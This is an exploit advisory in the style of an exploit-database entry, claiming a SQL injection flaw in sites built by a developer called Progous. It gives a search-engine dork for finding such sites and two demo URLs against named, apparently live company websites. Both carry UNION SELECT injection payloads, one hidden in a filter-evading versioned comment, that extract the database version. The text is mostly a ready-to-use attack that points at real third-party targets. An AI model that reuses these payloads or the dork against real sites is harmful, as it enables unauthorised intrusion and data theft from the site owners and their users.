*********************************************************
#Exploit Title: Development by Progous - SQL Injection vulnerability
#Date: 2020-11-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Design by Design Wise, Development by Progous"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Design by Design Wise, Development by Progous"
Demo :
http://www.siwakitchen.com/products.php?id=-8%20union%20select%201,2,version(),4,5--
https://www.sfeirindustries.com/products.php?id=-1%20/*!12345union*/%20select%201,2,version(),4,5--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************